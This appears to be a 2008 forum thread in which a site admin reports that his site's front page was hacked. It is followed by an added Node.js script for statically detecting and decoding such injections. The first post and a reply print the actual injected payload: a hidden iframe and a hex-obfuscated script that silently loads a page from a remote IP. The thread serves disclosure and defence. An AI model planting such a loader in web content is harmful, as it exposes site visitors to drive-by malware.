Author Topic: We've been hacked...
Darryn.R
TMO Admin
Some sneaky little fuckwits dun been and gone put this code on the TMO server !


code:
 <iframe src='http://url' width='1' height='1' style='visibility: hidden;'>
</iframe><script>function v47d2ad7bb6ca9(v47d2ad7bb70a6){ var v47d2ad7bb74a0=16; return(parseInt(v47d2ad7bb70a6,v47d2ad7bb74a0));}function v47d2ad7bb7c9a(v47d2ad7bb80af)
{ var v47d2ad7bb84b7='';for(v47d2ad7bb8a57=0; v47d2ad7bb8a57<v47d2ad7bb80af.length; v47d2ad7bb8a57+=2){ v47d2ad7bb84b7+=(String.fromCharCode(v47d2ad7bb6ca9(v47d2ad7bb80af.substr(v47d2ad7bb8a57, 2))));}
return v47d2ad7bb84b7;} document.write(v47d2ad7bb7c9a('3C5343524950543E77696E646F772E7374617475733D2744
6F6E65273B646F63756D656E742E777269746528273C696672
616D65206E616D653D6432207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F
6D28292A313534323536292B27396366616339663965395C27
2077696474683D343936206865696768743D33313120737479
6C653D5C27646973706C61793A206E6F6E655C273E3C2F6966
72616D653E27293C2F5343524950543E'));
</script>

It only seems to matter if you've been to the front page recently as it's a PHP redirect iframe thingy, I found it and removed it, but you'd best check your PCs and run antivirus software.

Sorry all..

I've been in touch with the people who admin my server to see if they can help..

Sabian, you seen this before ?

I know it's a redirect to an IP address hosted in Russia.

[ 08.03.2008, 13:58: Message edited by: Darryn.R ]

--------------------

my own brother a god dam shit sucking vampire!!! you wait till mum finds out buddy!


Posts: 6961  |  IP: Logged
sabian

code:
3C5343524950543E77696E646F772E7374617475733D2744
6F6E65273B646F63756D656E742E777269746528273C696672
616D65206E616D653D6432207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F
6D28292A313534323536292B27396366616339663965395C27
2077696474683D343936206865696768743D33313120737479
6C653D5C27646973706C61793A206E6F6E655C273E3C2F6966
72616D653E27293C2F5343524950543E

Is another iframe going to 77.221.xxx.xxx IP

Have I heard of it? Someone has either XSS'd you or managed to brute your account. I'm assuming it was an XSS of the CMS front end, as if it was a successful brute, the code would be present on all pages, not just index.

There is a spate of exploits going around though that can be identified, but no one really knows how they get there or even what some of them do.

  • http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/
  • http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/
  • http://www.webhostingtalk.com/showthread.php?t=651748
  • amongst more
Not to mention a new trick by using Google to help you get fucked by botnets...

--------------------
Evil isn't what you've done, it's feeling bad about it afterwards... Yield to temptation. It may not pass your way again.

Posts: 3793  |  IP: Logged
Darryn.R
TMO Admin
XSS almost certainly, yes it's going (or was till I removed it) to 77.221.xxx.xxx IP

Right arse pain.


Posts: 6961  |  IP: Logged
Darryn.R
TMO Admin
Seen it on a few other sites now too (not mine, not my server), this thing seems to have gone on a serious rampage Friday night..


Posts: 6961  |  IP: Logged
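
Added example, not part of the original thread: a Node.js sketch for statically triaging the kind of injection posted above (a hidden iframe plus a script that hex-decodes a string and hands it to document.write). It decodes long hex literals as data without running any page script, flags hidden iframes in each decoded layer, and defangs URLs for reporting; the function names and the sample page with `.example` hosts are constructed for illustration.

```javascript
// Added example: static triage of hex-obfuscated document.write injections (nothing is executed).

// Hex byte pairs -> text, tolerating whitespace from wrapped lines.
function hexToText(hex) {
  const clean = hex.replace(/\s+/g, '');
  if (clean.length % 2 !== 0 || /[^0-9a-f]/i.test(clean)) return null;
  let out = '';
  for (let i = 0; i < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.slice(i, i + 2), 16));
  }
  return out;
}

// Iframes sized 0/1 px or styled display:none / visibility:hidden.
function hiddenIframes(html) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  return tags.filter(t =>
    /\b(?:width|height)\s*=\s*\\?['"]?[01](?!\d)/i.test(t) ||
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(t));
}

// Make URLs non-clickable before they go into a ticket or chat.
function defang(text) {
  return text.replace(/https?:\/\/[^\s'"\\>]+/gi,
    (url) => url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
}

// Walk the page and every decoded layer, collecting findings.
function triage(html, layer = 0, findings = []) {
  for (const tag of hiddenIframes(html)) {
    findings.push({ layer, kind: 'hidden-iframe', evidence: defang(tag) });
  }
  if (layer >= 3) return findings;                    // bound nested decoding
  const hexLiteral = /(['"])([0-9a-fA-F\s]{40,})\1/g; // long all-hex string literal
  for (const m of html.matchAll(hexLiteral)) {
    const decoded = hexToText(m[2]);
    if (decoded === null) continue;
    findings.push({ layer: layer + 1, kind: 'hex-payload', evidence: defang(decoded) });
    triage(decoded, layer + 1, findings);
  }
  return findings;
}

// Constructed sample (not the payload from the thread); hosts are placeholders.
const inner = "<iframe src=\\'http://bad.example/go.html\\' style=\\'display: none\\'></iframe>";
const hex = Buffer.from(inner, 'latin1').toString('hex').toUpperCase();
const SAMPLE = "<iframe src='http://decoy.example/' width='1' height='1'></iframe>\n" +
  "<script>document.write(dec('" + hex.slice(0, 50) + "\n" + hex.slice(50) + "'));</script>";
console.log(triage(SAMPLE));
```

Run it over saved copies of the served pages or templates; a hex-payload finding on a page that should contain no encoded script is the signal to diff that file against a known-good copy.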
Contact Us | The Moon Online

copyright TMO y2k+

Powered by Infopop Corporation
UBB.classic™ 6.6.1